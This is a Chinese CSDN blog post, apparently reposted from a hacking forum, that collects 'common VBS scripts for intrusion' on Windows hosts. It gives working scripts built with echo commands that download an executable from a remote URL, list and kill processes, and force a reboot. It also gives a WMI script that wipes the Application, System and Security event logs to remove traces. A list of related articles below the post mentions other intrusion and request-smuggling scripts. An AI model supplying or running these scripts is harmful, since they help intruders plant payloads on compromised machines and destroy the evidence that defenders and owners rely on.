入侵常用vbs脚本

最新推荐文章于 2022-07-14 17:02:10 发布
最新推荐文章于 2022-07-14 17:02:10 发布
阅读量766 收藏 6
点赞数 1
分类专栏: T00ls 文章标签: application each security system 脚本 object
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6732333
版权

1.文件下载(无回显)

echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.vbe
echo xPost.Open “GET”,iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject(“ADODB.Stream”) >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe

用法: cscript hget.vbs http://www.xxx.com/1.exe 1.exe

2.列举进程

@echo for each ps in getobject _ >ps.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
用法:cscript ps.vbs
3.终止进程

@echo for each ps in getobject _ >pskill.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>pskill.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs
用法:cscript pskill.vbs pid
4.重启系统

@echo for each os in getobject _ >reboot.vbs
@echo (“winmgmts:!\\.\root\cimv2:win32_operatingsystem”).instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs
用法:cscript reboot.vbs

5.利用脚本编程删除日志

strComputer= “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Backup)}!\\” & _
strComputer & “\root\cimv2″)
dim mylogs(3)
mylogs(1)=”application”
mylogs(2)=”system”
mylogs(3)=”security”
for Each logs in mylogs
Set colLogFiles=objWMIService.ExecQuery _
(“Select * from Win32_NTEventLogFile where LogFileName=’”&logs&”‘”)
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next
将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog()方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。

7禧
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python入侵手机_python中的入侵检测脚本
weixin_32601635的博客
01-29 1722
Intrusion-detectionThe idea behind this script is to find out all the devices connected to your network and alert you of the untrusted ones. It could help you find out if your neighbors are connecting...
入侵常用vbs脚本 建议收藏
weixin_34037515的博客
11-15 328
1.文件下载(无回显)echo iLocal = LCase(Wwww.Arguments(1)) >iget.vbeecho iRemote = LCase(Wwww.Arguments(0)) >>iget.vbeecho Set xPost = CreateObject("Microsoft.XMLHTTP") >&g...
入侵常用vbs提权
weixin_30686845的博客
04-27 240
3389端口查询 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\...
linux 入侵检测脚本,Linux下简单的入侵检测
weixin_29141505的博客
05-01 524
总的来说,要判断主机是否正在或者已经遭受了攻击,需要以下几个步骤。1、终结非授权用户2、找出并关闭非授权进程3、分析日志文件,寻找入侵者曾经试图入侵系统的蛛丝马迹4、检查系统文件是否有潜在受损情况接下来说说具体操作1、首先以root登录到tty下,用root@mysun:~# w14:14:10 up 43 days, 4:43, 1 user, load average: 0.13, 0.08,...
计算机病毒的入侵路径,[浅谈VBS脚本病毒入侵计算机的途径与防治] 计算机病毒是指...
weixin_26851157的博客
07-13 588
[摘要]计算机病毒给世界范围内的计算机系统带了不可估量的危害,给人们留下了深刻的印象。网络脚本病毒是计算机病毒的一种新形式,主要采用脚本语言编写,书写形式灵活,容易产生变种,它可以对系统进行操作,包括创建、修改、删除,甚至格式化硬盘,传播速度快,危害性大。介绍VBS病毒的特点及发展现状,分析VBS病毒的原理、传播方式,并提出VBS病毒的防治策略。[关键词]VBS病毒入侵方式病毒防治中图分类号:TP...
windows常用bat/vbs脚本合集
06-09
这个"windows常用bat/vbs脚本合集"可能是包含了多种实用脚本的集合,旨在帮助用户简化日常任务,提高效率。以下是对这两种脚本的详细介绍: **批处理脚本(BAT)** 批处理脚本是基于DOS命令的文本文件,扩展名为....
WinCC常用C和VBS脚本.pdf
05-13
WinCC常用的C脚本VBS脚本对变量进行置位,复位,取反,读写变量;
管理网卡vbs脚本
09-06
VBS(Visual Basic Script)是一种基于Visual Basic的脚本语言,常用于Windows系统中的自动化任务。在本场景中,我们讨论的是使用VBS脚本来管理计算机的网卡,特别是实现网卡的启用和禁用功能。这个脚本的名称为`...
wincc VBS脚本加密破解
07-26
wincc VBS脚本加密破解
QTP常用VBS脚本
08-28
以下将详细讲解QTP中常用的一些VBS脚本知识点: 1. **生成随机数列**: - 第一种方法使用`Randomize`函数初始化随机数生成器,然后定义一个函数`rand`来生成指定范围内的整数。 - 第二种方法利用`RandomNumber....
tiscripts:Turbo入侵脚本
04-13
Turbo入侵脚本 这只是一个仓库,我保留了自己的个人Turbo Intruder帮助程序脚本。 DesyncAttack_CLTE.py和DesyncAttack_TECL.py 我使用这些脚本为CLTE和TECL样式攻击创建请求走私去同步有效载荷。 如何使用: 打开打p 打开“ Repeater”选项卡到您的目标 右键单击您的请求,然后单击“发送到Turbo Intruder” 用DesyncAttack_CLTE.py或DesyncAttack_TECL.py完全替换脚本窗格(底部窗格) 不需要顶部的(请求)窗格,脚本会创建自己的请求 填写攻击的所有攻击参数(脚本内的文档) 点击“攻击” 执照 这些脚本是根据MIT许可发布的。 请参阅。
入侵渗透专用的python小脚本
aluo3002的博客
07-17 408
渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小实用。 一、记录root密码小工具 root.py #!/usr/bin/python importos,sys,getpass,time current_time=time.strftime("%Y-%m-%d%H:%M") ...
使用vbs脚本添加域网络共享驱动器
weixin_30405421的博客
06-03 227
MapNetworkDrive Method Adds a shared network drive to your computer system. object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword]) Arguments ...
入侵计算机案例脚本,记一次生产环境脚本入侵检测与警告案例(简易版入侵检测系统)...
weixin_32480335的博客
07-29 491
概述因业务需要,需监控某web站点目录下所有文件是否被恶意篡改(文件内容被改了),如果有就打印改动的文件名(发邮件),定时任务每3分钟执行一次。下面简单介绍下实现过程。一、生成md5验证文件1、文件的校验文件find /var/html/www/* -type f |xargs md5sum >/tmp/check/web_file_check.md5sum2、目录的校验文件tree /va...
cmd echo写入shell_渗透技巧——通过cmd上传文件的N种方法
weixin_34570232的博客
01-14 543
0x00 前言在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。0x02 测试环境OS:Win7 x86test exe:ssss2.exe,成功运行后输出10x03 通用上传方法1、 debugdebug是一个程序调试工具,功能包括:直接输入,更改,跟踪,...
VBS下载并保存
lacoucou的专栏
07-14 1121
VBS下载并保存。
vbs常用代码
hubowei的专栏
04-02 1451
vbs常用代码 转载自:http://www.suntw.com/webcode/vbs-chang-yong-dai-ma-shou-ji.html 在网上查找资料的时候发现好多经典的vbs代码,收集起来也为了以后学习。 VBS脚本用途很多: 1. 计算 2. 处理文件和文件夹 3. 管理Windows 4. 处理Word, Excel, PowerPoint等Of
VBS之adodb.stream对象的方法/属性
热门推荐
迎风悟极道的专栏
09-19 2万+
adodb.stream对象的方法/属性 Cancel 方法 使用方法如下 Object.Cancel 说明:取消执行挂起的异步 Execute 或 Open 方法的调用。 Close 方法 使用方法如下 Object.Close :关闭对像 CopyTo 方法 使用方法如下 Object.CopyTo(destStream,[CharNumber]
"VBS脚本精品代码集锦:收录常用经典代码,助力VBS脚本编程学习和开发
总之,VBS脚本是一种功能强大的脚本语言,通过收集和整理经典的VBS代码,我们可以更好地学习和应用这门语言,实现各种各样的任务和功能。希望这些收集的VBS代码能够对大家有所帮助,并且我将会持续更新和分享更多的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值